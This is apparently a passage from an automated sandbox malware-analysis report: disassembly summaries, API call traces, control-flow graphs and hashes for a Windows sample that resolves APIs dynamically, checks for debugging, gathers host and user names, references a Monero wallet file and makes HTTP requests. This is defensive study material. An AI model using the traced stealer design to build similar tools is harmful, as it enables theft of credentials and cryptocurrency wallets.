                        • GetProcAddress.KERNEL32(75070000,008A1840), ref: 00F19B02
                        • GetProcAddress.KERNEL32(75FD0000,008A1858), ref: 00F19B23
                        • GetProcAddress.KERNEL32(75FD0000,008A9C88), ref: 00F19B3B
                        • GetProcAddress.KERNEL32(75A50000,008A9BB0), ref: 00F19B5D
                        • GetProcAddress.KERNEL32(74E50000,00896720), ref: 00F19B7E
                        • GetProcAddress.KERNEL32(76E80000,008A9760), ref: 00F19B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00F19BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00F19BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 0be27ce867520cc0f0d4b2dcecfe1b09697e1ad979aa368c857f2c1fd57aa884
                        • Instruction ID: 63ebec3b86aca1bfe27352d2f51794783ebab8ee24530a6d3a5db8b2c824316c
                        • Opcode Fuzzy Hash: 0be27ce867520cc0f0d4b2dcecfe1b09697e1ad979aa368c857f2c1fd57aa884
                        • Instruction Fuzzy Hash: 47A16DBD5C46019FE37CDFA8F5989563BF9FF88A12306453AA6278320CD63A94C1DB50

                        Control-flow Graph (rendered as an image in the report; legend: Executed / Not Executed)
                        Recovered blocks: f045c0-f04695 (RtlAllocateHeap) -> f046a0-f046a6; f046a0-f046a6 -> f046ac-f0474a or f0474f-f047a9 (VirtualProtect); f046ac-f0474a -> f046a0-f046a6 (loop).
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F0460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F0479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30): 00F045C7, 00F045D2, 00F045DD, 00F045E8, 00F045F3, 00F04617, 00F04622, 00F0462D, 00F04638, 00F04643, 00F04657, 00F04662, 00F0466D, 00F04678, 00F04683, 00F046AC, 00F046B7, 00F046C2, 00F046CD, 00F046D8, 00F04713, 00F0471E, 00F04729, 00F04734, 00F0473F, 00F0474F, 00F0475A, 00F04765, 00F04770, 00F0477B
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one string, repeated 30 times and joined with $)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: fc1c11b84b88447fdeb340eea2bf7bdaa014bd2e2ee7d205d2967ca0217f3aae
                        • Instruction ID: 5545f1dcba10e9147bffc96b4a88768c0334a419df90774a4b10afd492fdfcea
                        • Opcode Fuzzy Hash: fc1c11b84b88447fdeb340eea2bf7bdaa014bd2e2ee7d205d2967ca0217f3aae
                        • Instruction Fuzzy Hash: 974106606DB61C7BE624F7A5A8C6EBE7757FF46F08F509040E80266285CAB0B600F527

                        Control-flow Graph (rendered as an image in the report; legend: Executed / Not Executed)
                        Recovered blocks: entry f04880-f04942 (InternetOpenA, StrCmpCA) -> f04955-f04acd (InternetConnectA) -> f04aef-f04b22 (HttpOpenRequestA) -> f04b28-f04e28 (lstrlen, HttpSendRequestA) -> f04e32-f04e5c (InternetReadFile, looped via f04e69-f04ea7) -> f04e67-f04eb9 (InternetCloseHandle) -> f04ebe-f04ec5 (InternetCloseHandle) -> f04ecb-f04ef3 (InternetCloseHandle) -> f04f32-f04fa2; failure edges from the entry, connect and open-request blocks go straight to the InternetCloseHandle blocks.
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F04915
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F0493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F04ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F20DDB,00000000,?,?,00000000,?,",00000000,?,008AF2E8), ref: 00F04DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F04E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F04E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F04E49
                        • InternetCloseHandle.WININET(00000000), ref: 00F04EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00F04EC5
                        • HttpOpenRequestA.WININET(00000000,008AF258,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F04B15
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • InternetCloseHandle.WININET(00000000), ref: 00F04ECF
                        Strings
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 67cf6059756b8312a156866bce8392691107cca6cb9e25dcafb967783984864b
                        • Instruction ID: 8cf81b29c2e71da1c32ac6fba4980b40ffd4de1eb29706307d469b74d2ca37b4
                        • Opcode Fuzzy Hash: 67cf6059756b8312a156866bce8392691107cca6cb9e25dcafb967783984864b
                        • Instruction Fuzzy Hash: 3F12F172912118AADB15EB90DD92FEEB378BF14320F504199B10663091EF746FCADF62
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00F1792F
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 16ebed996b6f663dd38103e59bf47c39614bc5d77b840d2c0d92cd26427ca3dc
                        • Instruction ID: 078c95615fae36ebab87a91b67d604b2c870723c21ab24196527de1a87295b4a
                        • Opcode Fuzzy Hash: 16ebed996b6f663dd38103e59bf47c39614bc5d77b840d2c0d92cd26427ca3dc
                        • Instruction Fuzzy Hash: C901F9B1948305EFD714DF84D945BAFBBB8FB04B21F100269F556E3280C37459448BA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F011B7), ref: 00F17880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F1789F
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: c2c6d07b88b0fca4cbabd3c56210634f50b1a8523b8220c3bbb7abb7e39ccbfe
                        • Instruction ID: 9eed2659eb5df35b27081c03a1c567636cc019fb94d76b242e7218d496e6f9a0
                        • Opcode Fuzzy Hash: c2c6d07b88b0fca4cbabd3c56210634f50b1a8523b8220c3bbb7abb7e39ccbfe
                        • Instruction Fuzzy Hash: D5F0AFB1944209ABC714DF88D949BAEBBB8FB04B22F10022AFA16A3680C77415448BA1
                        APIs
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 97e37a153ad4703921713c04b3d6f5d87f33568defd76512c486e238cac49e45
                        • Instruction ID: 2c26f1ec6e6e8dfb12f34a2054147f2f49d7c8aef707549697b5a763839de2c4
                        • Opcode Fuzzy Hash: 97e37a153ad4703921713c04b3d6f5d87f33568defd76512c486e238cac49e45
                        • Instruction Fuzzy Hash: 85D05E7894030CDBCB28DFE0E8496DDBB7CFB08712F000564E90663340EA3164C1CBA5

                        Control-flow Graph

                        control_flow_graph 633 f19c10-f19c1a 634 f19c20-f1a031 GetProcAddress * 43 633->634 635 f1a036-f1a0ca LoadLibraryA * 8 633->635 634->635 636 f1a146-f1a14d 635->636 637 f1a0cc-f1a141 GetProcAddress * 5 635->637 638 f1a153-f1a211 GetProcAddress * 8 636->638 639 f1a216-f1a21d 636->639 637->636 638->639 640 f1a298-f1a29f 639->640 641 f1a21f-f1a293 GetProcAddress * 5 639->641 642 f1a2a5-f1a332 GetProcAddress * 6 640->642 643 f1a337-f1a33e 640->643 641->640 642->643 644 f1a344-f1a41a GetProcAddress * 9 643->644 645 f1a41f-f1a426 643->645 644->645 646 f1a4a2-f1a4a9 645->646 647 f1a428-f1a49d GetProcAddress * 5 645->647 648 f1a4ab-f1a4d7 GetProcAddress * 2 646->648 649 f1a4dc-f1a4e3 646->649 647->646 648->649 650 f1a515-f1a51c 649->650 651 f1a4e5-f1a510 GetProcAddress * 2 649->651 652 f1a612-f1a619 650->652 653 f1a522-f1a60d GetProcAddress * 10 650->653 651->650 654 f1a61b-f1a678 GetProcAddress * 4 652->654 655 f1a67d-f1a684 652->655 653->652 654->655 656 f1a686-f1a699 GetProcAddress 655->656 657 f1a69e-f1a6a5 655->657 656->657 658 f1a6a7-f1a703 GetProcAddress * 4 657->658 659 f1a708-f1a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(75900000,008968A0), ref: 00F19C2D
                        • GetProcAddress.KERNEL32(75900000,00896920), ref: 00F19C45
                        • GetProcAddress.KERNEL32(75900000,008A9EB0), ref: 00F19C5E
                        • GetProcAddress.KERNEL32(75900000,008A9EE0), ref: 00F19C76
                        • GetProcAddress.KERNEL32(75900000,008ADA10), ref: 00F19C8E
                        • GetProcAddress.KERNEL32(75900000,008ADBC0), ref: 00F19CA7
                        • GetProcAddress.KERNEL32(75900000,0089BFF8), ref: 00F19CBF
                        • GetProcAddress.KERNEL32(75900000,008ADAA0), ref: 00F19CD7
                        • GetProcAddress.KERNEL32(75900000,008AD9E0), ref: 00F19CF0
                        • GetProcAddress.KERNEL32(75900000,008ADB00), ref: 00F19D08
                        • GetProcAddress.KERNEL32(75900000,008ADB30), ref: 00F19D20
                        • GetProcAddress.KERNEL32(75900000,008966C0), ref: 00F19D39
                        • GetProcAddress.KERNEL32(75900000,00896960), ref: 00F19D51
                        • GetProcAddress.KERNEL32(75900000,008966A0), ref: 00F19D69
                        • GetProcAddress.KERNEL32(75900000,00896A20), ref: 00F19D82
                        • GetProcAddress.KERNEL32(75900000,008ADB60), ref: 00F19D9A
                        • GetProcAddress.KERNEL32(75900000,008AD998), ref: 00F19DB2
                        • GetProcAddress.KERNEL32(75900000,0089C070), ref: 00F19DCB
                        • GetProcAddress.KERNEL32(75900000,00896980), ref: 00F19DE3
                        • GetProcAddress.KERNEL32(75900000,008AD980), ref: 00F19DFB
                        • GetProcAddress.KERNEL32(75900000,008ADB48), ref: 00F19E14
                        • GetProcAddress.KERNEL32(75900000,008ADAE8), ref: 00F19E2C
                        • GetProcAddress.KERNEL32(75900000,008ADA58), ref: 00F19E44
                        • GetProcAddress.KERNEL32(75900000,008966E0), ref: 00F19E5D
                        • GetProcAddress.KERNEL32(75900000,008ADAB8), ref: 00F19E75
                        • GetProcAddress.KERNEL32(75900000,008AD920), ref: 00F19E8D
                        • GetProcAddress.KERNEL32(75900000,008ADAD0), ref: 00F19EA6
                        • GetProcAddress.KERNEL32(75900000,008ADA28), ref: 00F19EBE
                        • GetProcAddress.KERNEL32(75900000,008AD908), ref: 00F19ED6
                        • GetProcAddress.KERNEL32(75900000,008AD9B0), ref: 00F19EEF
                        • GetProcAddress.KERNEL32(75900000,008ADB78), ref: 00F19F07
                        • GetProcAddress.KERNEL32(75900000,008ADB90), ref: 00F19F1F
                        • GetProcAddress.KERNEL32(75900000,008ADB18), ref: 00F19F38
                        • GetProcAddress.KERNEL32(75900000,008AAE20), ref: 00F19F50
                        • GetProcAddress.KERNEL32(75900000,008ADBA8), ref: 00F19F68
                        • GetProcAddress.KERNEL32(75900000,008AD968), ref: 00F19F81
                        • GetProcAddress.KERNEL32(75900000,008969A0), ref: 00F19F99
                        • GetProcAddress.KERNEL32(75900000,008AD950), ref: 00F19FB1
                        • GetProcAddress.KERNEL32(75900000,008969E0), ref: 00F19FCA
                        • GetProcAddress.KERNEL32(75900000,008AD9C8), ref: 00F19FE2
                        • GetProcAddress.KERNEL32(75900000,008ADBD8), ref: 00F19FFA
                        • GetProcAddress.KERNEL32(75900000,008964E0), ref: 00F1A013
                        • GetProcAddress.KERNEL32(75900000,00896620), ref: 00F1A02B
                        • LoadLibraryA.KERNEL32(008AD9F8,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A03D
                        • LoadLibraryA.KERNEL32(008AD938,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A04E
                        • LoadLibraryA.KERNEL32(008AD8F0,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A060
                        • LoadLibraryA.KERNEL32(008ADA40,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A072
                        • LoadLibraryA.KERNEL32(008ADA70,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A083
                        • LoadLibraryA.KERNEL32(008ADA88,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A095
                        • LoadLibraryA.KERNEL32(008ADD58,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A0A7
                        • LoadLibraryA.KERNEL32(008ADCB0,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A0B8
                        • GetProcAddress.KERNEL32(75FD0000,00896300), ref: 00F1A0DA
                        • GetProcAddress.KERNEL32(75FD0000,008ADC80), ref: 00F1A0F2
                        • GetProcAddress.KERNEL32(75FD0000,008A97E0), ref: 00F1A10A
                        • GetProcAddress.KERNEL32(75FD0000,008ADCC8), ref: 00F1A123
                        • GetProcAddress.KERNEL32(75FD0000,008962E0), ref: 00F1A13B
                        • GetProcAddress.KERNEL32(73530000,0089C048), ref: 00F1A160
                        • GetProcAddress.KERNEL32(73530000,00896500), ref: 00F1A179
                        • GetProcAddress.KERNEL32(73530000,0089C200), ref: 00F1A191
                        • GetProcAddress.KERNEL32(73530000,008ADC68), ref: 00F1A1A9
                        • GetProcAddress.KERNEL32(73530000,008ADD28), ref: 00F1A1C2
                        • GetProcAddress.KERNEL32(73530000,00896640), ref: 00F1A1DA
                        • GetProcAddress.KERNEL32(73530000,00896600), ref: 00F1A1F2
                        • GetProcAddress.KERNEL32(73530000,008ADC20), ref: 00F1A20B
                        • GetProcAddress.KERNEL32(763B0000,00896440), ref: 00F1A22C
                        • GetProcAddress.KERNEL32(763B0000,008963A0), ref: 00F1A244
                        • GetProcAddress.KERNEL32(763B0000,008ADD70), ref: 00F1A25D
                        • GetProcAddress.KERNEL32(763B0000,008ADD10), ref: 00F1A275
                        • GetProcAddress.KERNEL32(763B0000,00896320), ref: 00F1A28D
                        • GetProcAddress.KERNEL32(750F0000,0089BE68), ref: 00F1A2B3
                        • GetProcAddress.KERNEL32(750F0000,0089C138), ref: 00F1A2CB
                        • GetProcAddress.KERNEL32(750F0000,008ADC98), ref: 00F1A2E3
                        • GetProcAddress.KERNEL32(750F0000,008963C0), ref: 00F1A2FC
                        • GetProcAddress.KERNEL32(750F0000,00896340), ref: 00F1A314
                        • GetProcAddress.KERNEL32(750F0000,0089C0E8), ref: 00F1A32C
                        • GetProcAddress.KERNEL32(75A50000,008ADCE0), ref: 00F1A352
                        • GetProcAddress.KERNEL32(75A50000,00896400), ref: 00F1A36A
                        • GetProcAddress.KERNEL32(75A50000,008A9860), ref: 00F1A382
                        • GetProcAddress.KERNEL32(75A50000,008ADCF8), ref: 00F1A39B
                        • GetProcAddress.KERNEL32(75A50000,008ADD40), ref: 00F1A3B3
                        • GetProcAddress.KERNEL32(75A50000,008965C0), ref: 00F1A3CB
                        • GetProcAddress.KERNEL32(75A50000,00896520), ref: 00F1A3E4
                        • GetProcAddress.KERNEL32(75A50000,008ADD88), ref: 00F1A3FC
                        • GetProcAddress.KERNEL32(75A50000,008ADDA0), ref: 00F1A414
                        • GetProcAddress.KERNEL32(75070000,00896540), ref: 00F1A436
                        • GetProcAddress.KERNEL32(75070000,008ADC38), ref: 00F1A44E
                        • GetProcAddress.KERNEL32(75070000,008ADBF0), ref: 00F1A466
                        • GetProcAddress.KERNEL32(75070000,008ADC08), ref: 00F1A47F
                        • GetProcAddress.KERNEL32(75070000,008ADC50), ref: 00F1A497
                        • GetProcAddress.KERNEL32(74E50000,00896280), ref: 00F1A4B8
                        • GetProcAddress.KERNEL32(74E50000,008962A0), ref: 00F1A4D1
                        • GetProcAddress.KERNEL32(75320000,00896660), ref: 00F1A4F2
                        • GetProcAddress.KERNEL32(75320000,008AD710), ref: 00F1A50A
                        • GetProcAddress.KERNEL32(6F060000,00896420), ref: 00F1A530
                        • GetProcAddress.KERNEL32(6F060000,008963E0), ref: 00F1A548
                        • GetProcAddress.KERNEL32(6F060000,008964C0), ref: 00F1A560
                        • GetProcAddress.KERNEL32(6F060000,008AD740), ref: 00F1A579
                        • GetProcAddress.KERNEL32(6F060000,00896460), ref: 00F1A591
                        • GetProcAddress.KERNEL32(6F060000,00896560), ref: 00F1A5A9
                        • GetProcAddress.KERNEL32(6F060000,008965E0), ref: 00F1A5C2
                        • GetProcAddress.KERNEL32(6F060000,008962C0), ref: 00F1A5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00F1A5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00F1A607
                        • GetProcAddress.KERNEL32(74E00000,008AD620), ref: 00F1A629
                        • GetProcAddress.KERNEL32(74E00000,008A9810), ref: 00F1A641
                        • GetProcAddress.KERNEL32(74E00000,008AD758), ref: 00F1A659
                        • GetProcAddress.KERNEL32(74E00000,008AD788), ref: 00F1A672
                        • GetProcAddress.KERNEL32(74DF0000,00896480), ref: 00F1A693
                        • GetProcAddress.KERNEL32(6D090000,008AD8A8), ref: 00F1A6B4
                        • GetProcAddress.KERNEL32(6D090000,008964A0), ref: 00F1A6CD
                        • GetProcAddress.KERNEL32(6D090000,008AD800), ref: 00F1A6E5
                        • GetProcAddress.KERNEL32(6D090000,008AD7A0), ref: 00F1A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: cbc74cc019dc5055838830eb8849f919c807d47039f91f9722eef34ab1e9bfe9
                        • Instruction ID: d0adf72fde795fb16ae99b6fb57ce951a74055e3457d076d50c44c33384c6056
                        • Opcode Fuzzy Hash: cbc74cc019dc5055838830eb8849f919c807d47039f91f9722eef34ab1e9bfe9
                        • Instruction Fuzzy Hash: 39622EBD5C06019FE37CDFA8F5989563BF9EF88A12316453AA627C320CD63A94C1DB50

                        Control-flow Graph

                        control_flow_graph 1033 f06280-f0630b call f1a7a0 call f047b0 call f1a740 InternetOpenA StrCmpCA 1040 f06314-f06318 1033->1040 1041 f0630d 1033->1041 1042 f06509-f06525 call f1a7a0 call f1a800 * 2 1040->1042 1043 f0631e-f06342 InternetConnectA 1040->1043 1041->1040 1061 f06528-f0652d 1042->1061 1044 f06348-f0634c 1043->1044 1045 f064ff-f06503 InternetCloseHandle 1043->1045 1047 f0635a 1044->1047 1048 f0634e-f06358 1044->1048 1045->1042 1051 f06364-f06392 HttpOpenRequestA 1047->1051 1048->1051 1053 f064f5-f064f9 InternetCloseHandle 1051->1053 1054 f06398-f0639c 1051->1054 1053->1045 1056 f063c5-f06405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 f0639e-f063bf InternetSetOptionA 1054->1057 1059 f06407-f06427 call f1a740 call f1a800 * 2 1056->1059 1060 f0642c-f0644b call f18940 1056->1060 1057->1056 1059->1061 1067 f064c9-f064e9 call f1a740 call f1a800 * 2 1060->1067 1068 f0644d-f06454 1060->1068 1067->1061 1071 f06456-f06480 InternetReadFile 1068->1071 1072 f064c7-f064ef InternetCloseHandle 1068->1072 1076 f06482-f06489 1071->1076 1077 f0648b 1071->1077 1072->1053 1076->1077 1080 f0648d-f064c5 call f1a9b0 call f1a8a0 call f1a800 1076->1080 1077->1072 1080->1071
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • InternetOpenA.WININET(00F20DFE,00000001,00000000,00000000,00000000), ref: 00F062E1
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F06335
                        • HttpOpenRequestA.WININET(00000000,GET,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F06385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F063BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F063D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F063FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F0646D
                        • InternetCloseHandle.WININET(00000000), ref: 00F064EF
                        • InternetCloseHandle.WININET(00000000), ref: 00F064F9
                        • InternetCloseHandle.WININET(00000000), ref: 00F06503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 757983606dad2cfbd85b9b60d82cf24da3b3b90c20e75c6fafeb6c3499b3eda6
                        • Instruction ID: 9d8cfa32cf8321917628fc5c32f28f8d3d35766ebcee8ce4dd64ba7ef039ed7d
                        • Opcode Fuzzy Hash: 757983606dad2cfbd85b9b60d82cf24da3b3b90c20e75c6fafeb6c3499b3eda6
                        • Instruction Fuzzy Hash: E3716F75A40218ABEB24DFA0DC49BEE7778FF44710F108158F10AAB1C4DBB56A85EF51

                        Control-flow Graph

                        control_flow_graph 1090 f15510-f15577 call f15ad0 call f1a820 * 3 call f1a740 * 4 1106 f1557c-f15583 1090->1106 1107 f15585-f155b6 call f1a820 call f1a7a0 call f01590 call f151f0 1106->1107 1108 f155d7-f1564c call f1a740 * 2 call f01590 call f152c0 call f1a8a0 call f1a800 call f1aad0 StrCmpCA 1106->1108 1123 f155bb-f155d2 call f1a8a0 call f1a800 1107->1123 1134 f15693-f156a9 call f1aad0 StrCmpCA 1108->1134 1138 f1564e-f1568e call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1108->1138 1123->1134 1139 f157dc-f15844 call f1a8a0 call f1a820 * 2 call f01670 call f1a800 * 4 call f16560 call f01550 1134->1139 1140 f156af-f156b6 1134->1140 1138->1134 1269 f15ac3-f15ac6 1139->1269 1142 f157da-f1585f call f1aad0 StrCmpCA 1140->1142 1143 f156bc-f156c3 1140->1143 1162 f15991-f159f9 call f1a8a0 call f1a820 * 2 call f01670 call f1a800 * 4 call f16560 call f01550 1142->1162 1163 f15865-f1586c 1142->1163 1146 f156c5-f15719 call f1a820 call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1143->1146 1147 f1571e-f15793 call f1a740 * 2 call f01590 call f152c0 call f1a8a0 call f1a800 call f1aad0 StrCmpCA 1143->1147 1146->1142 1147->1142 1245 f15795-f157d5 call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1147->1245 1162->1269 1168 f15872-f15879 1163->1168 1169 f1598f-f15a14 call f1aad0 StrCmpCA 1163->1169 1175 f158d3-f15948 call 